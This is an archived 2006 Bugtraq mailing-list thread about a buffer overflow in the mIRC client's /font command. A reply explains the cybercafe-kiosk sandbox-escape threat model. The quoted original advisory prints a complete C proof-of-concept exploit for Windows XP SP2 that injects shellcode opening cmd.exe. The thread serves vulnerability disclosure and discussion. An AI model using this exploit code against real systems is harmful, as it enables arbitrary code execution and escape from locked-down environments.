lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 1 Feb 2006 23:20:52 +0100
From: "D.C. van Moolenbroek" <dc.van.moolenbroek@...llo.nl>
To: <bugtraq@...urityfocus.com>
Subject: Re: Buffer Overflow /Font on mIRC


As quite some confusion has arisen as to how exactly this and the previous 
finding [1] are security vulnerabilities, allow me to explain the issue in a 
little more detail. The main point is that these are attacks of local users 
against a locked-down (kiosk) system where the users can only run mIRC and 
no other programs.

In order for these vulnerabilities to have any significance, the following 
requirements would have to be met for an attacker on a system, at a minimum:

* The attacker is able to run mIRC, or it has been started for him already;
* The built-in /run, /dll and /com commands are password-locked in the mIRC 
options;
* The mIRC directory, and mIRC's root (current) directory, are read-only;
* The attacker is _not_ able to start arbitrary programs on his user 
account.

The result of using this exploit is then:

* The attacker is able to start arbitrary programs on his user account.

I.e. if you restrict a local user's abilities, and then set up and consider 
mIRC to be a sandboxed environment for him, the local user can break out of 
that sandboxed environment using this exploit. As indicated by the poster in 
his first mail, environments at risk from this would typically be 
cybercafes, where clients are only able to run (e.g.) a locked-down browser 
and mIRC, and nothing else. The 'victim' of the exploitation would then be 
the owner of the cybercafe.

Although the reported bugs can indeed be called security vulnerabilities in 
such environments, it's somewhat of a stretch, given that mIRC doesn't 
actually claim to be a complete sandbox, and already allows the user to e.g. 
create/overwrite any writable file and make arbitrary socket connections 
anyway. And fortunately, only a relatively small number of people are 
affected by this vulnerability at all - certainly not any end-user. Either 
way, these are bugs, and should of course be fixed.

Note that as the targeted environment obviously doesn't allow the user to 
run a compiled exploit, actual exploitation would require that the shellcode 
be constructed in mIRC's scripting language. It's rather easy to do that, 
though.

Kind regards,
David van Moolenbroek

[1] http://www.securityfocus.com/archive/1/420000

----- Original Message ----- 
From: "Krpata, Tyler" <tkrpata@....com>
To: "Crowdat Kurobudetsu" <crowdat@...il.com>; <bugtraq@...urityfocus.com>
Sent: Friday, January 27, 2006 12:36 AM
Subject: RE: Buffer Overflow /Font on mIRC


I'm not following your English...are you saying you believe that this IS
or is NOT an exploitable bug?

-----Original Message-----
From: Crowdat Kurobudetsu [mailto:crowdat@...il.com]
Sent: Tuesday, January 24, 2006 6:24 AM
To: bugtraq@...urityfocus.com
Subject: Buffer Overflow /Font on mIRC

- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is well
equipped with options and tools.

- 2 - Vulnerability description

This bug was discovered by a friend (Racy) , with the command exposed by
Racy only hung mIRC, but after debugging and

testing, I discover that allow code execution.
Racy use this command /font -z $readini(c:\a\a.ini,aaaaaaa ,aaaa)
$readini(c:\a\a.ini,aaaaaaa ,aaaa) , in both cases return

null and crash, if the first parameter it's null and the second a long
string can overwrite the EIP and execute code, with

user privileges, DON'T ELEVATE PRIVILEGES.


- 3 - How to exploit it

This PoC open a cmd.exe,also it's possible execute any other code.

----------- CUT HERE ----------------------
/*
mircfontexploitXPSP2.c

This PoC it's for XP SP2 English
Special thanks to Racy from irc-hispano
*/


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle;
char command[512]= "/font -z $null";
char strClass[30];
char buffer[128]=
"\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

char shellcode[999]=
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3";

//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7
(WinXP Sp2 English)

char saltaoffset[]="\xD6\xD1\xE5\x77"; // jmp esp 0x77E5D1D6
(advapi32.dll)

SetForegroundWindow(lHandle);
lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit

", 0);

if (!lHandle) { printf("Can't find mIRC\n"); return 0; }

strcat(buffer,saltaoffset);
strcat(buffer,shellcode);
strcat(command,buffer);
printf("mIRC Font Command Exploit: %s\n", command);

SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)command); SendMessage
(lHandle, WM_IME_KEYDOWN, VK_RETURN, 0); }

----------- CUT HERE ----------------------


- 4 - Solution

Khaled contacted with me about the latest advisory, he says don't have
any bug, any vulnerability.
This is the solution of Khaled:
"as far as I can tell, this is neither an exploit nor a vulnerability.
The above report describes a local bug in mIRC. The

author of the report indicates that any malicious software on your
computer can modify your mIRC settings to cause mIRC to

crash. But if you have malicious software on your computer, you've
already compromised your security..."

I post a response in the messageboard in mIRC forum, telling that a
exploit isn't a malicious software alone, isn't a trojan

or virus, and if a application it's secure, it's impossibly to execute
any code, the user don't compromise the machine if

download a exploit, the machine it's compromised if the program it's
vulnerable to the exploit, but Khaled delete it and

close the thread.

More info:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Number=146129&
an=0&page=0#146129

- 5 - Credits

URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 24/01/2006

Racy post on messageboard:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Board=bugrepor
ts&Number=118751
Spanish Advisory and Compiled Spanish Exploit:
http://cyruxnet.org/archivo.php?20060121.00

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ